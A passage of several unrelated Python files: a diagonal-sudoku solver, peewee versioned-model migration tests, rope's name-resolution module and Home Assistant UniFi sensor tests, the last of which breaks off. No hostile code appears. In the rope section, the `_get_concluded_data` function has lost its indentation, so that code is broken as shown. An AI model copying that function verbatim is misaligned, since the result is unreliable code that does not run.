    squares = [cross(rs, cs)
               for rs in ('ABC', 'DEF', 'GHI')
               for cs in ('123', '456', '789')]
    for digit in '123456789':
        for unit in line_units:
            # Boxes of this unit that can still hold the digit.
            candidates = [b for b in unit if digit in result[b]]
            # With one candidate the digit is effectively placed already.
            if len(candidates) <= 1:
                continue
            for square in squares:
                if all(c in square for c in candidates):
                    # Remove the digit from the rest of that square.
                    for other in square:
                        if other not in candidates:
                            logging.debug("Shared Subgroup: Removing %s from %s", digit, other)
                            result[other] = result[other].replace(digit, '')
    return result
def naked_twins(values):
    """Eliminate values using the naked twins strategy.

    Two boxes of a unit that share the same two-digit candidate set must
    hold those two digits between them, so the digits can be removed from
    every other box of the unit.

    Args:
        values(dict): a dictionary of the form {'box_name': '123456789', ...}
    Returns:
        the values dictionary with the naked twins eliminated from peers.
    """
    result = values.copy()
    rows = 'ABCDEFGHI'
    cols = '123456789'
    # All units: columns, rows, 3x3 squares and both diagonals.
    all_units = (
        [cross(rows, c) for c in cols] +
        [cross(r, cols) for r in rows] +
        [cross(rs, cs) for rs in ('ABC', 'DEF', 'GHI') for cs in ('123', '456', '789')] +
        [[r + c for r, c in zip(rows, cols)],
         [r + c for r, c in zip(rows, cols[::-1])]]
    )
    for unit in all_units:
        # Ordered pairs of distinct boxes sharing the same two candidates.
        pairs = [
            (box_a, box_b)
            for box_a in unit
            for box_b in unit
            if len(result[box_a]) == 2
            and result[box_a] == result[box_b]
            and box_a != box_b
        ]
        for pair in pairs:
            # A twin has exactly two candidate digits.
            digit_one = result[pair[0]][0]
            digit_two = result[pair[0]][1]
            for box in unit:
                # The twins themselves keep their values.
                if box not in pair:
                    logging.debug("Naked Twins: Removing %s and %s from %s", digit_one, digit_two, box)
                    result[box] = result[box].replace(digit_one, '')
                    result[box] = result[box].replace(digit_two, '')
    return result
def cross(A, B):
    """Calculate the cross product of two arrays.

    Args:
        A(list) - the left side of the cross product
        B(list) - the right side of the cross product
    Returns:
        A list containing all concatenations s+t for s in A and t in B
    """
    combos = []
    for left in A:
        for right in B:
            combos.append(left + right)
    return combos
def grid_values(grid):
    """
    Convert grid into a dict of {square: char} with '123456789' for empties.

    Args:
        grid(string) - A grid in string form: one character per box, row by
            row; '.' marks an empty box.
    Returns:
        A grid in dictionary form
            Keys: The boxes, e.g., 'A1'
            Values: The value in each box, e.g., '8'. If the box has no
            value, then the value will be '123456789'.
    """
    rows = 'ABCDEFGHI'
    cols = '123456789'
    boxes = cross(rows, cols)
    values = {}
    # Iterate with enumerate instead of range(len(...)); indexing grid
    # directly preserves the IndexError on a too-short input string.
    for index, box in enumerate(boxes):
        values[box] = grid[index].replace('.', '123456789')
    return values
def display(values):
    """
    Display the values as a 2-D grid with 3x3 sub-grid separators.

    Input: The sudoku in dictionary form
    Output: None (prints to stdout)
    """
    rows = 'ABCDEFGHI'
    cols = '123456789'
    all_boxes = cross(rows, cols)
    # Column width fits the widest remaining candidate string.
    width = 1 + max(len(values[box]) for box in all_boxes)
    separator = '+'.join(['-' * (width * 3)] * 3)
    for r in rows:
        cells = []
        for c in cols:
            # Vertical dividers after columns 3 and 6.
            cells.append(values[r + c].center(width) + ('|' if c in '36' else ''))
        print(''.join(cells))
        # Horizontal dividers after rows C and F.
        if r in 'CF':
            print(separator)
    return
def eliminate(values):
    """
    Eliminate all values from boxes inside a unit that are already bound to a box.

    Args:
        values(dict) - Sudoku grid as a dictionary
                       Keys: The boxes, e.g., 'A1'
                       Values: All possible values for a box
    Returns:
        The grid dictionary, stripped off all values that are already bound.
    """
    # Make a copy of the dictionary
    tmp_vals = values.copy()
    rows = 'ABCDEFGHI'
    cols = '123456789'
    # Generate all boxes and units
    boxes = cross(rows,cols)
    vertical_units = [ cross(rows,col) for col in cols ]
    horizontal_units = [ cross(row,cols) for row in rows ]
    squared_units = [ cross(row,col) for row in ['ABC', 'DEF', 'GHI'] for col in ['123','456','789'] ]
    # Diagonals are included: this solver targets diagonal sudoku.
    diagonal_units = [ [row+col for row,col in zip(rows,cols)], [row+col for row,col in zip(rows,cols[::-1])] ]
    # Put them all in a single list for easier processing
    unit_list = vertical_units + horizontal_units + squared_units + diagonal_units
    # These boxes are already assigned a single value
    solved_boxes = [ box for box in boxes if len(values[box]) == 1 ]
    # Eliminate those values from all boxes within a unit that are already taken
    for box in solved_boxes:
        for unit in unit_list:
            if box in unit:
                num = values[box]
                for b in unit:
                    if b != box:
                        logging.debug("Eliminate: Removing %s from %s",num,b)
                        # NOTE(review): assign_value mutates the *input* dict
                        # ``values`` (and records snapshots) while the working
                        # copy is updated on the next line — confirm the
                        # in-place mutation of the argument is intended.
                        assign_value(values,b,tmp_vals[b].replace(num,''))
                        tmp_vals[b] = tmp_vals[b].replace(num,'')
    # And finally return the modified version of the grid dictionary
    return tmp_vals
def only_choice(values):
    """
    Assign a value to a box if no other box within the same unit can take this value.

    Arg:
        values(dict) - Sudoku grid as a dictionary
                       Keys: The boxes, e.g., 'A1'
                       Values: All possible values for a box
    Returns:
        The grid dictionary after assigning all only choices
    """
    # Make a copy of the dictionary
    tmp_vals = values.copy()
    rows = 'ABCDEFGHI'
    cols = '123456789'
    # We need all units again
    vertical_units = [ cross(rows,col) for col in cols ]
    horizontal_units = [ cross(row,cols) for row in rows ]
    squared_units = [ cross(row,col) for row in ['ABC', 'DEF', 'GHI'] for col in ['123','456','789'] ]
    diagonal_units = [ [row+col for row,col in zip(rows,cols)], [row+col for row,col in zip(rows,cols[::-1])] ]
    # Put them all in a single list for easier processing
    unit_list = vertical_units + horizontal_units + squared_units + diagonal_units
    for unit in unit_list:
        for box in unit:
            # Fetch the possible values for all cells within this unit except for the one we are looking at
            numstring = ''
            for b in unit:
                if b != box:
                    numstring += tmp_vals[b]
            # If there is a value that does not occur anywhere else, assigned it and return to the outer loop
            # NOTE(review): candidates are read from the *original* ``values``
            # dict, not the working copy, and assign_value mutates ``values``
            # in place — confirm both are intended.
            for num in values[box]:
                if num not in numstring:
                    logging.debug("Only Choice: assigning %s to %s",num,box)
                    assign_value(values,box,num)
                    tmp_vals[box] = num
                    break
    return tmp_vals
def reduce_puzzle(values):
    """Apply the constraint-propagation heuristics until they stop helping.

    Args:
        values(dict) - Sudoku grid as a dictionary
            Keys: The boxes, e.g., 'A1'
            Values: All possible values for a box
    Returns:
        The grid dictionary once a full pass makes no further progress.
    """
    # Never mutate the caller's dictionary directly.
    grid = values.copy()
    # The heuristics are applied in this (arbitrary) order each round.
    heuristics = [eliminate, only_choice, shared_subgroup, naked_twins]
    while True:
        # Total number of open candidates before this round.
        before = sum(len(v) for v in grid.values() if len(v) > 1)
        for heuristic in heuristics:
            grid = heuristic(grid)
        # ... and after; identical totals mean we are stuck.
        after = sum(len(v) for v in grid.values() if len(v) > 1)
        if before == after:
            return grid
def search(values):
    """
    Applies all heuristics to a sudoku grid and uses recursion if necessary
    Args:
        values(dict) - Sudoku grid as a dictionary
            Keys: The boxes, e.g., 'A1'
            Values: All possible values for a box
    Returns:
        The solved grid, or False if no solution could be found
    """
    # Try all we can without guessing
    tmp_vals = reduce_puzzle(values)
    # If there is any field that has no possible values then this attempt is
    # wrong.  BUGFIX: inspect the *reduced* grid -- constraint propagation can
    # empty a box in tmp_vals even when the incoming `values` still looked
    # consistent, and the old check of `values` missed that contradiction.
    for v in tmp_vals.values():
        if len(v) == 0:
            return False
    # If all boxes contain exactly one number we can return a successful solution
    if all(len(v) == 1 for v in tmp_vals.values()):
        return tmp_vals
    # Now we have to branch: First, find all boxes that contain more than one possible value
    candidates = [k for k in tmp_vals if len(tmp_vals[k]) > 1]
    # Then choose the box with the least amount of options
    best_box = min(candidates, key=lambda k: len(tmp_vals[k]))
    # Now try assigning these values one by one and see if this leads us to a solution (recursively)
    for num in tmp_vals[best_box]:
        attempt = tmp_vals.copy()
        attempt[best_box] = num
        result = search(attempt)
        if result:
            return result
    # Everything has failed...
    return False
def solve(grid):
    """Find the solution to a Sudoku grid.

    Args:
        grid(string): a string representing a sudoku grid.
            Example: '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
    Returns:
        The dictionary representation of the final sudoku grid. False if no solution exists.
    """
    # Parse the 81-character string into the box->candidates dictionary,
    # then run the full depth-first search over it.
    parsed = grid_values(grid)
    return search(parsed)
if __name__ == '__main__':
    # Example diagonal sudoku puzzle ('.' marks an empty box).
    diag_sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
    logging.basicConfig(level=logging.INFO)
    # Solve and print the finished grid.
    display(solve(diag_sudoku_grid))
    try:
        from visualize import visualize_assignments
        visualize_assignments(assignments)
    except SystemExit:
        pass
    except:
        # NOTE(review): bare except deliberately makes visualization
        # best-effort -- any pygame/import failure falls through to the
        # friendly message below.
        print('We could not visualize your board due to a pygame issue. Not a problem! It is not a requirement.')
|
|
import os
import unittest
from peewee import CharField, BooleanField, ForeignKeyField, SqliteDatabase
from playhouse.db_url import connect
from playhouse.migrate import SqliteMigrator, MySQLMigrator, PostgresqlMigrator
from playhouse.reflection import Introspector
from . import VersionedModel
from . import migrate
# Setup Database: honour the DATABASE env var, defaulting to in-memory SQLite.
database_url = os.environ.get('DATABASE', None)
if database_url:
    database = connect(database_url)
    # The URL schemes are mutually exclusive, so use an elif chain instead
    # of three independent ifs; the matching migrator is picked by scheme.
    if database_url.startswith('mysql'):
        migrator = MySQLMigrator.from_database(database)
    elif database_url.startswith('postgres'):
        migrator = PostgresqlMigrator.from_database(database)
    elif database_url.startswith('sqlite'):
        migrator = SqliteMigrator.from_database(database)
else:
    database = SqliteDatabase(':memory:')
    migrator = SqliteMigrator.from_database(database)
# Introspector is used by the assertion helpers to reflect the live schema.
introspector = Introspector.from_database(database)
# Basic example class
class BaseClass(VersionedModel):
    # All test models share the module-level database connection.
    class Meta:
        database = database
class Food(BaseClass):
    # Simple versioned model used by most tests below.
    name = CharField(null=True)
    is_tasty = BooleanField()
class Chow(BaseClass):
    # Same shape as Food; the rename_table test renames 'food' -> 'chow'
    # and then reads the rows back through this model.
    name = CharField(null=True)
    is_tasty = BooleanField()
class Menu(BaseClass):
    # Target model for the foreign-key migration tests.
    name = CharField()
class TestMigrations(unittest.TestCase):
    """Verify that migrations run through `migrate` are mirrored on the
    hidden *version* tables (e.g. 'foodversion') kept by VersionedModel."""

    def setUp(self):
        Food.create_table()
        Menu.create_table()

    def tearDown(self):
        try:
            Food.drop_table()
        # FIX: narrow the bare `except:` -- it also swallowed
        # KeyboardInterrupt/SystemExit.
        except Exception:
            # Food does not exist after rename_table_test
            Chow.drop_table()
        Menu.drop_table()

    # Helper Functions
    def assertTableHasColumn(self, table, column, type_=None):
        """Assert `table` exists and has `column`, optionally of type `type_`."""
        models = introspector.generate_models()
        self.assertTrue(
            table in models, "table '{}' should be in models".format(table))
        self.assertTrue(column in models[
            table]._meta.fields, "column '{}' should be in fields".format(column))
        if type_ is not None:
            self.assertTrue(
                isinstance(models[table]._meta.fields[column], type_))

    def assertTableDoesNotHaveColumn(self, table, column):
        """Assert `table` exists but `column` is absent from it."""
        models = introspector.generate_models()
        self.assertTrue(
            table in models, "table '{}' should be in models".format(table))
        # FIX: the failure message previously said "should be in fields",
        # the opposite of what this helper asserts.
        self.assertFalse(column in models[
            table]._meta.fields, "column '{}' should not be in fields".format(column))

    def assertTableExists(self, table):
        """Assert `table` is present in the reflected schema."""
        models = introspector.generate_models()
        self.assertTrue(
            table in models, "table '{}' should be in models".format(table))

    def assertTableDoesNotExist(self, table):
        """Assert `table` is absent from the reflected schema."""
        models = introspector.generate_models()
        # FIX: message previously said "should be in models" on a negative
        # assertion.
        self.assertFalse(
            table in models, "table '{}' should not be in models".format(table))

    # Tests
    def test_add_column(self):
        """Adding a column also adds it to the version table."""
        another_column = CharField(null=True)
        migrate(migrator.add_column('food', 'another_column', another_column))
        self.assertTableHasColumn('food', 'another_column', CharField)
        self.assertTableHasColumn('foodversion', 'another_column', CharField)

    def test_add_column_foreign_key(self):
        '''
        Versioned Models should not have foreign key references
        '''
        another_column = ForeignKeyField(
            Menu, related_name='food', null=True, to_field=Menu.id)
        migrate(migrator.add_column('food', 'another_column', another_column))
        self.assertTableHasColumn('food', 'another_column', ForeignKeyField)
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')

    def test_drop_column(self):
        """Dropping a column also drops it from the version table."""
        migrate(migrator.drop_column('food', 'is_tasty'))
        self.assertTableDoesNotHaveColumn('food', 'is_tasty')
        self.assertTableDoesNotHaveColumn('foodversion', 'is_tasty')

    def test_drop_column_not_in_version(self):
        """Dropping a column that was never versioned must not fail."""
        another_column = ForeignKeyField(
            Menu, related_name='food', null=True, to_field=Menu.id)
        migrate(migrator.add_column('food', 'another_column', another_column))
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
        migrate(migrator.drop_column('food', 'another_column'))
        self.assertTableDoesNotHaveColumn('food', 'another_column')

    def test_rename_column(self):
        """Renaming a column is mirrored on the version table."""
        migrate(migrator.rename_column('food', 'is_tasty', 'was_tasty'))
        self.assertTableDoesNotHaveColumn('food', 'is_tasty')
        self.assertTableDoesNotHaveColumn('foodversion', 'is_tasty')
        self.assertTableHasColumn('food', 'was_tasty')
        self.assertTableHasColumn('foodversion', 'was_tasty')

    def test_rename_column_not_in_version(self):
        """Renaming a non-versioned column leaves the version table alone."""
        another_column = ForeignKeyField(
            Menu, related_name='food', null=True, to_field=Menu.id)
        migrate(migrator.add_column('food', 'another_column', another_column))
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
        migrate(migrator.rename_column('food', 'another_column', 'new_column'))
        self.assertTableDoesNotHaveColumn('food', 'another_column')
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
        self.assertTableHasColumn('food', 'new_column')
        self.assertTableDoesNotHaveColumn('foodversion', 'new_column')

    def test_add_not_null(self):
        """add_not_null applies to both the table and its version table."""
        models = introspector.generate_models()
        food = models['food']
        foodversion = models['foodversion']
        self.assertTrue(food.name.null)
        self.assertTrue(foodversion.name.null)
        migrate(migrator.add_not_null('food', 'name'))
        models = introspector.generate_models()
        food = models['food']
        foodversion = models['foodversion']
        self.assertFalse(food.name.null)
        self.assertFalse(foodversion.name.null)

    def test_add_not_null_not_in_version(self):
        """add_not_null on a non-versioned column touches only the table."""
        another_column = CharField(null=True, default='')
        migrate(migrator.add_column('food', 'another_column', another_column))
        # drop the field from the nested version
        migrator.drop_column('foodversion', 'another_column').run()
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
        models = introspector.generate_models()
        food = models['food']
        self.assertTrue(food.another_column.null)
        migrate(migrator.add_not_null('food', 'another_column'))
        models = introspector.generate_models()
        food = models['food']
        self.assertFalse(food.another_column.null)
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')

    def test_drop_not_null(self):
        """drop_not_null applies to both the table and its version table."""
        models = introspector.generate_models()
        food = models['food']
        foodversion = models['foodversion']
        self.assertFalse(food.is_tasty.null)
        self.assertFalse(foodversion.is_tasty.null)
        migrate(migrator.drop_not_null('food', 'is_tasty'))
        models = introspector.generate_models()
        food = models['food']
        foodversion = models['foodversion']
        self.assertTrue(food.is_tasty.null)
        self.assertTrue(foodversion.is_tasty.null)

    def test_drop_not_null_not_in_version(self):
        """drop_not_null on a non-versioned column touches only the table."""
        another_column = CharField(default='')
        migrate(migrator.add_column('food', 'another_column', another_column))
        # drop the field from the nested version
        migrator.drop_column('foodversion', 'another_column').run()
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
        models = introspector.generate_models()
        food = models['food']
        self.assertFalse(food.another_column.null)
        migrate(migrator.drop_not_null('food', 'another_column'))
        models = introspector.generate_models()
        food = models['food']
        self.assertTrue(food.another_column.null)
        self.assertTableDoesNotHaveColumn('foodversion', 'another_column')

    def test_rename_table(self):
        """Renaming a table renames its version table and keeps history."""
        self.assertTableExists('food')
        self.assertTableExists('foodversion')
        # Create some foods
        food_kwargs = ({'name': '1', 'is_tasty': False},
                       {'name': '2', 'is_tasty': False},
                       {'name': '3', 'is_tasty': False},
                       {'name': '4', 'is_tasty': False})
        for kwargs in food_kwargs:
            Food.create(**kwargs)
        migrate(migrator.rename_table('food', 'chow'))
        self.assertTableExists('chow')
        self.assertTableExists('chowversion')
        self.assertTableDoesNotExist('food')
        self.assertTableDoesNotExist('foodversion')
        # check to make sure the versions still exist
        for kwargs in food_kwargs:
            chow = Chow.get(Chow.name == kwargs['name'])
            self.assertEqual(len(chow._versions), 1)
            version = chow._versions[0]
            for key, value in kwargs.items():
                self.assertEqual(value, getattr(chow, key))
                self.assertEqual(value, getattr(version, key))

    def test_add_index(self):
        """Indexes are added to the table only, never the version table."""
        migrate(migrator.add_index('food', ['name']))
        models = introspector.generate_models()
        self.assertTrue(models['food'].name.index)
        self.assertFalse(models['foodversion'].name.index)

    def test_drop_index(self):
        """drop_index removes the index from the table."""
        # create an index
        migrate(migrator.add_index('food', ['name']))
        models = introspector.generate_models()
        self.assertTrue(models['food'].name.index)
        # Drop the index
        migrate(migrator.drop_index('food', 'food_name'))
        models = introspector.generate_models()
        self.assertFalse(models['food'].name.index)
        self.assertFalse(models['foodversion'].name.index)
if __name__ == '__main__':
    # Allow running this module directly as a test script.
    unittest.main()
|
|
import rope.base.pyobjects
from rope.base import exceptions, utils
class PyName(object):
    """References to `PyObject`\s inside python programs"""
    # Abstract interface: both methods are stubs (implicitly return None);
    # concrete subclasses below provide the behavior.
    def get_object(self):
        """Return the `PyObject` object referenced by this `PyName`"""
    def get_definition_location(self):
        """Return a (module, lineno) tuple"""
class DefinedName(PyName):
    """A name bound directly to an already-known `PyObject`."""

    def __init__(self, pyobject):
        self.pyobject = pyobject

    def get_object(self):
        return self.pyobject

    def get_definition_location(self):
        # Definition site comes from the wrapped object's module and AST node.
        module = self.pyobject.get_module()
        lineno = self.pyobject.get_ast().lineno
        return (module, lineno)
class AssignedName(PyName):
    """Only a placeholder"""
    # Marker type for names created by assignment; carries no behavior here.
class UnboundName(PyName):
    """A name with no resolved object; falls back to the unknown object."""

    def __init__(self, pyobject=None):
        if pyobject is None:
            pyobject = rope.base.pyobjects.get_unknown()
        self.pyobject = pyobject

    def get_object(self):
        return self.pyobject

    def get_definition_location(self):
        # Unbound names have no definition site.
        return (None, None)
class AssignmentValue(object):
    """An assigned expression"""

    def __init__(self, ast_node, levels=None, evaluation='',
                 assign_type=False):
        """`levels` is `None` for simple assignments and a list of
        indices for tuple assignments.  For example in::

            a, (b, c) = x

        the levels for `a` are ``[0]``, for `b` ``[1, 0]`` and for
        `c` ``[1, 1]``.
        """
        self.ast_node = ast_node
        self.levels = [] if levels is None else levels
        self.evaluation = evaluation
        self.assign_type = assign_type

    def get_lineno(self):
        # Line number is taken straight from the wrapped AST node.
        return self.ast_node.lineno
class EvaluatedName(PyName):
    """A name whose object will be evaluated later"""
    def __init__(self, callback, module=None, lineno=None):
        # `callback` computes the object on demand; the result is cached in
        # the module's concluded data when a module is supplied.
        self.module = module
        self.lineno = lineno
        self.callback = callback
        self.pyobject = _Inferred(callback, _get_concluded_data(module))
    def get_object(self):
        # Triggers (or reuses) the lazy evaluation.
        return self.pyobject.get()
    def get_definition_location(self):
        return (self.module, self.lineno)
    def invalidate(self):
        """Forget the `PyObject` this `PyName` holds"""
        self.pyobject.set(None)
class ParameterName(PyName):
    """Only a placeholder"""
    # Marker type for function-parameter names; carries no behavior here.
class ImportedModule(PyName):
    """A name referring to an imported module.

    The module is resolved lazily -- either from an explicit `resource`,
    or by (possibly relative) name lookup -- and cached in the importing
    module's concluded data.
    """

    def __init__(self, importing_module, module_name=None,
                 level=0, resource=None):
        self.importing_module = importing_module
        self.module_name = module_name
        # Relative-import level; 0 is used for absolute imports.
        self.level = level
        self.resource = resource
        # Concluded-data slot caching the resolved pymodule.
        self.pymodule = _get_concluded_data(self.importing_module)

    def _current_folder(self):
        """Return the folder containing the importing module, or None."""
        resource = self.importing_module.get_module().get_resource()
        if resource is None:
            return None
        return resource.parent

    def _get_pymodule(self):
        """Resolve and cache the imported module; None when it cannot be found."""
        if self.pymodule.get() is None:
            pycore = self.importing_module.pycore
            if self.resource is not None:
                self.pymodule.set(pycore.project.get_pymodule(self.resource))
            elif self.module_name is not None:
                try:
                    if self.level == 0:
                        pymodule = pycore.project.get_module(
                            self.module_name, self._current_folder())
                    else:
                        pymodule = pycore.project.get_relative_module(
                            self.module_name, self._current_folder(),
                            self.level)
                    self.pymodule.set(pymodule)
                except exceptions.ModuleNotFoundError:
                    # Unresolvable imports simply stay unknown.
                    pass
        return self.pymodule.get()

    def get_object(self):
        # FIX: resolve once into a local instead of calling _get_pymodule()
        # twice (the second call repeated the cache lookup).
        pymodule = self._get_pymodule()
        if pymodule is None:
            return rope.base.pyobjects.get_unknown()
        return pymodule

    def get_definition_location(self):
        pymodule = self._get_pymodule()
        if not isinstance(pymodule, rope.base.pyobjects.PyDefinedObject):
            return (None, None)
        # Imported modules are considered defined at line 1 of their file.
        return (pymodule.get_module(), 1)
class ImportedName(PyName):
    """A name pulled out of another module, as in ``from mod import name``."""

    def __init__(self, imported_module, imported_name):
        self.imported_module = imported_module
        self.imported_name = imported_name

    def _get_imported_pyname(self):
        # Look the name up inside the imported module; fall back to an
        # UnboundName when it is missing or resolves back to ourselves.
        try:
            pyname = self.imported_module.get_object()[self.imported_name]
            if pyname != self:
                return pyname
        except exceptions.AttributeNotFoundError:
            pass
        return UnboundName()

    @utils.prevent_recursion(rope.base.pyobjects.get_unknown)
    def get_object(self):
        return self._get_imported_pyname().get_object()

    @utils.prevent_recursion(lambda: (None, None))
    def get_definition_location(self):
        return self._get_imported_pyname().get_definition_location()
def _get_concluded_data(module):
if module is None:
return rope.base.pyobjects._ConcludedData()
return module._get_concluded_data()
def _circular_inference():
    # Callback for `utils.prevent_recursion`: raised when evaluating an
    # object would recurse into its own inference.
    raise rope.base.pyobjects.IsBeingInferredError(
        'Circular Object Inference')
class _Inferred(object):
    # Lazily evaluates `get_inferred` and caches the result, either in a
    # concluded-data slot (shared with the owning module) or, when none is
    # given, in a plain instance attribute.
    def __init__(self, get_inferred, concluded=None):
        self.get_inferred = get_inferred
        self.concluded = concluded
        if self.concluded is None:
            # No concluded slot: fall back to caching on the instance.
            self.temp = None
    @utils.prevent_recursion(_circular_inference)
    def get(self, *args, **kwds):
        # Re-run the inference callback only when nothing is cached yet.
        if self.concluded is None or self.concluded.get() is None:
            self.set(self.get_inferred(*args, **kwds))
        if self._get() is None:
            # Inference produced nothing; cache the "unknown" object so
            # callers always receive a usable PyObject.
            self.set(rope.base.pyobjects.get_unknown())
        return self._get()
    def set(self, pyobject):
        if self.concluded is not None:
            self.concluded.set(pyobject)
        self.temp = pyobject
    def _get(self):
        # The concluded slot, when present, is the authoritative cache.
        if self.concluded is not None:
            return self.concluded.get()
        return self.temp
|
|
"""UniFi sensor platform tests."""
from datetime import datetime
from unittest.mock import patch
from aiounifi.controller import MESSAGE_CLIENT, MESSAGE_CLIENT_REMOVED
import pytest
from homeassistant.components.device_tracker import DOMAIN as TRACKER_DOMAIN
from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN
from homeassistant.components.unifi.const import (
CONF_ALLOW_BANDWIDTH_SENSORS,
CONF_ALLOW_UPTIME_SENSORS,
CONF_TRACK_CLIENTS,
CONF_TRACK_DEVICES,
DOMAIN as UNIFI_DOMAIN,
)
from homeassistant.helpers.dispatcher import async_dispatcher_send
import homeassistant.util.dt as dt_util
from .test_controller import setup_unifi_integration
async def test_no_clients(hass, aioclient_mock):
    """Test the update_clients function when no clients are found."""
    await setup_unifi_integration(
        hass,
        aioclient_mock,
        options={
            CONF_ALLOW_BANDWIDTH_SENSORS: True,
            CONF_ALLOW_UPTIME_SENSORS: True,
        },
    )
    # Sensors are enabled but the controller reports no clients,
    # so no sensor entities should be created.
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 0
async def test_bandwidth_sensors(hass, aioclient_mock, mock_unifi_websocket):
    """Verify that bandwidth sensors are working as expected."""
    wired_client = {
        "hostname": "Wired client",
        "is_wired": True,
        "mac": "00:00:00:00:00:01",
        "oui": "Producer",
        "wired-rx_bytes": 1234000000,
        "wired-tx_bytes": 5678000000,
    }
    wireless_client = {
        "is_wired": False,
        "mac": "00:00:00:00:00:02",
        "name": "Wireless client",
        "oui": "Producer",
        "rx_bytes": 2345000000,
        "tx_bytes": 6789000000,
    }
    options = {
        CONF_ALLOW_BANDWIDTH_SENSORS: True,
        CONF_ALLOW_UPTIME_SENSORS: False,
        CONF_TRACK_CLIENTS: False,
        CONF_TRACK_DEVICES: False,
    }
    config_entry = await setup_unifi_integration(
        hass,
        aioclient_mock,
        options=options,
        clients_response=[wired_client, wireless_client],
    )
    # Two rx/tx sensor pairs; states are the byte counters divided by 1e6.
    assert len(hass.states.async_all()) == 5
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 4
    assert hass.states.get("sensor.wired_client_rx").state == "1234.0"
    assert hass.states.get("sensor.wired_client_tx").state == "5678.0"
    assert hass.states.get("sensor.wireless_client_rx").state == "2345.0"
    assert hass.states.get("sensor.wireless_client_tx").state == "6789.0"
    # Verify state update
    wireless_client["rx_bytes"] = 3456000000
    wireless_client["tx_bytes"] = 7891000000
    mock_unifi_websocket(
        data={
            "meta": {"message": MESSAGE_CLIENT},
            "data": [wireless_client],
        }
    )
    await hass.async_block_till_done()
    assert hass.states.get("sensor.wireless_client_rx").state == "3456.0"
    assert hass.states.get("sensor.wireless_client_tx").state == "7891.0"
    # Disable option
    options[CONF_ALLOW_BANDWIDTH_SENSORS] = False
    hass.config_entries.async_update_entry(config_entry, options=options.copy())
    await hass.async_block_till_done()
    # All bandwidth sensors are removed when the option is turned off.
    assert len(hass.states.async_all()) == 1
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 0
    assert hass.states.get("sensor.wireless_client_rx") is None
    assert hass.states.get("sensor.wireless_client_tx") is None
    assert hass.states.get("sensor.wired_client_rx") is None
    assert hass.states.get("sensor.wired_client_tx") is None
    # Enable option
    options[CONF_ALLOW_BANDWIDTH_SENSORS] = True
    hass.config_entries.async_update_entry(config_entry, options=options.copy())
    await hass.async_block_till_done()
    assert len(hass.states.async_all()) == 5
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 4
    assert hass.states.get("sensor.wireless_client_rx")
    assert hass.states.get("sensor.wireless_client_tx")
    assert hass.states.get("sensor.wired_client_rx")
    assert hass.states.get("sensor.wired_client_tx")
    # Try to add the sensors again, using a signal
    clients_connected = {wired_client["mac"], wireless_client["mac"]}
    devices_connected = set()
    controller = hass.data[UNIFI_DOMAIN][config_entry.entry_id]
    async_dispatcher_send(
        hass,
        controller.signal_update,
        clients_connected,
        devices_connected,
    )
    await hass.async_block_till_done()
    # No duplicates should be created by the second add.
    assert len(hass.states.async_all()) == 5
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 4
@pytest.mark.parametrize(
    "initial_uptime,event_uptime,new_uptime",
    [
        # Uptime listed in epoch time should never change
        (1609462800, 1609462800, 1612141200),
        # Uptime counted in seconds increases with every event
        (60, 64, 60),
    ],
)
async def test_uptime_sensors(
    hass,
    aioclient_mock,
    mock_unifi_websocket,
    initial_uptime,
    event_uptime,
    new_uptime,
):
    """Verify that uptime sensors are working as expected."""
    uptime_client = {
        "mac": "00:00:00:00:00:01",
        "name": "client1",
        "oui": "Producer",
        "uptime": initial_uptime,
    }
    options = {
        CONF_ALLOW_BANDWIDTH_SENSORS: False,
        CONF_ALLOW_UPTIME_SENSORS: True,
        CONF_TRACK_CLIENTS: False,
        CONF_TRACK_DEVICES: False,
    }
    # Freeze "now" so the computed uptime timestamp is deterministic.
    now = datetime(2021, 1, 1, 1, 1, 0, tzinfo=dt_util.UTC)
    with patch("homeassistant.util.dt.now", return_value=now):
        config_entry = await setup_unifi_integration(
            hass,
            aioclient_mock,
            options=options,
            clients_response=[uptime_client],
        )
    assert len(hass.states.async_all()) == 2
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 1
    assert hass.states.get("sensor.client1_uptime").state == "2021-01-01T01:00:00+00:00"
    # Verify normal new event doesn't change uptime
    # 4 seconds has passed
    uptime_client["uptime"] = event_uptime
    now = datetime(2021, 1, 1, 1, 1, 4, tzinfo=dt_util.UTC)
    with patch("homeassistant.util.dt.now", return_value=now):
        mock_unifi_websocket(
            data={
                "meta": {"message": MESSAGE_CLIENT},
                "data": [uptime_client],
            }
        )
        await hass.async_block_till_done()
    assert hass.states.get("sensor.client1_uptime").state == "2021-01-01T01:00:00+00:00"
    # Verify new event change uptime
    # 1 month has passed
    uptime_client["uptime"] = new_uptime
    now = datetime(2021, 2, 1, 1, 1, 0, tzinfo=dt_util.UTC)
    with patch("homeassistant.util.dt.now", return_value=now):
        mock_unifi_websocket(
            data={
                "meta": {"message": MESSAGE_CLIENT},
                "data": [uptime_client],
            }
        )
        await hass.async_block_till_done()
    assert hass.states.get("sensor.client1_uptime").state == "2021-02-01T01:00:00+00:00"
    # Disable option
    options[CONF_ALLOW_UPTIME_SENSORS] = False
    hass.config_entries.async_update_entry(config_entry, options=options.copy())
    await hass.async_block_till_done()
    assert len(hass.states.async_all()) == 1
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 0
    assert hass.states.get("sensor.client1_uptime") is None
    # Enable option
    options[CONF_ALLOW_UPTIME_SENSORS] = True
    with patch("homeassistant.util.dt.now", return_value=now):
        hass.config_entries.async_update_entry(config_entry, options=options.copy())
        await hass.async_block_till_done()
    assert len(hass.states.async_all()) == 2
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 1
    assert hass.states.get("sensor.client1_uptime")
    # Try to add the sensors again, using a signal
